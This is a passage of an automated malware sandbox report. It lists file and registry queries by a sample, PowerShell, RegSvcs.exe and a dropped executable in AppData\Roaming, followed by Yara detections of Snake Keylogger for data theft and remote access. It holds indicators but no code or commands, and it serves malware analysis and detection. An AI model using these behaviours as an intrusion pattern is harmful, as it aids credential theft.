Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\DUBAI-REGULAR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\DUBAI-MEDIUM.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NPadpxkCGKGoat.exe	Queries volume information: C:\Users\user\AppData\Roaming\NPadpxkCGKGoat.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NPadpxkCGKGoat.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NPadpxkCGKGoat.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NPadpxkCGKGoat.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NPadpxkCGKGoat.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation

Source: C:\Users\user\Desktop\file.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected Snake Keylogger

Source: Yara match	File source: 8.2.NPadpxkCGKGoat.exe.3e090b8.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.file.exe.4771620.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.NPadpxkCGKGoat.exe.3eb06e8.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.file.exe.4771620.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.file.exe.46a75e0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.file.exe.470c600.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.NPadpxkCGKGoat.exe.3eb06e8.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.NPadpxkCGKGoat.exe.3e090b8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000006.00000002.1821617182.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.1875749509.0000000002C81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1734665410.0000000004501000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.1784692461.0000000003E04000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.1824025899.0000000003181000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: file.exe PID: 6784, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 2120, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: NPadpxkCGKGoat.exe PID: 7236, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 7380, type: MEMORYSTR

Source: Yara match	File source: 8.2.NPadpxkCGKGoat.exe.3e090b8.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.file.exe.4771620.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.NPadpxkCGKGoat.exe.3eb06e8.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.file.exe.4771620.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.file.exe.46a75e0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.file.exe.470c600.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.NPadpxkCGKGoat.exe.3eb06e8.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.NPadpxkCGKGoat.exe.3e090b8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000006.00000002.1821617182.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1734665410.0000000004501000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.1784692461.0000000003E04000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: file.exe PID: 6784, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 2120, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: NPadpxkCGKGoat.exe PID: 7236, type: MEMORYSTR

Remote Access Functionality

Yara detected Snake Keylogger

Source: Yara match	File source: 8.2.NPadpxkCGKGoat.exe.3e090b8.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.file.exe.4771620.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.NPadpxkCGKGoat.exe.3eb06e8.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.file.exe.4771620.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.file.exe.46a75e0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.file.exe.470c600.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.NPadpxkCGKGoat.exe.3eb06e8.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.NPadpxkCGKGoat.exe.3e090b8.2.raw.unpack, type: UNPACKEDPE
